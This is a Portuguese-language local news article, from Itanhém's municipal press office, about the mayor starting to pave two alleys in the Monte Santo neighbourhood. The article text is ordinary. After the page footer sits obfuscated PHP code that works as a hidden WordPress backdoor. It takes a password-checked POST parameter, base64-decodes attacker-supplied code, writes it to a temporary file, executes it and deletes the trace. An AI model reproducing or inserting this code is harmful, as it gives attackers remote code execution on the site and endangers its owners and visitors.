• SEJA BEM-VINDO

Prefeito Mildson inicia pavimentação de mais duas ruas no Bairro Monte Santo

Publicado em: 19/01/2022 Atualizado:: janeiro 19, 2022

 

As obras contemplam os serviços de nivelamento, calçamento em blocos sextavados

 

Os transtornos dos moradores das ruas conhecidas como Beco I e Beco II, localizadas no bairro Monte Santo, já estão com os dias contados. O prefeito Mildson Medeiros, através da Secretaria Municipal de Infraestrutura, dando continuidade a execução de várias obras de melhorias das vias públicas do município, iniciou, nesta segunda-feira (17), a pavimentação das duas ruas citadas.

 

As obras contemplam os serviços de nivelamento, calçamento em blocos sextavados e, a depender de como for, construção de uma escadaria na rua Beco II.

 

Os serviços começaram pela rua Beco II, que receberá cerca de 760m² de calçamento. Em seguida, os trabalhadores iniciarão os trabalhos na rua Beco I, que receberá cerca de 780m². A revitalização visa, além da melhoria da qualidade de vida dos moradores, garantir mais segurança para moradores e a todos que transitam no local.

 

De acordo com o prefeito, as obras são uma prioridade da gestão municipal. Destaca ainda que Itanhém é um dos municípios que mais realiza intervenções, mesmo diante das dificuldades enfrentadas em todo país.

 

 

 

“Mesmo com toda a dificuldade, a nossa cidade não para. Hoje, Itanhém é um verdadeiro canteiro de obras. Isso mostra a visão social da gestão municipal, que tem investindo em calçamento na sede e distritos, construção de um novo cemitério, reforma de escolas, postos de saúde, prédios públicos, praças, implementação do nosso Detran, investimentos na saúde e várias outras melhorias e benefícios para nosso povo. É uma felicidade imensa fazer parte desta história. Sempre comprometidos para que os processos aconteçam com mais celeridade. Nosso foco é o andamento e finalização das obras para que o nosso povo fique feliz”, disse Mildson.

 

A prefeitura ainda tem realizado serviços de recuperação de estradas e pontes e iniciará novas frentes de trabalho no distrito de Batinga.

 

 

Fonte: Ascom/PMI


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}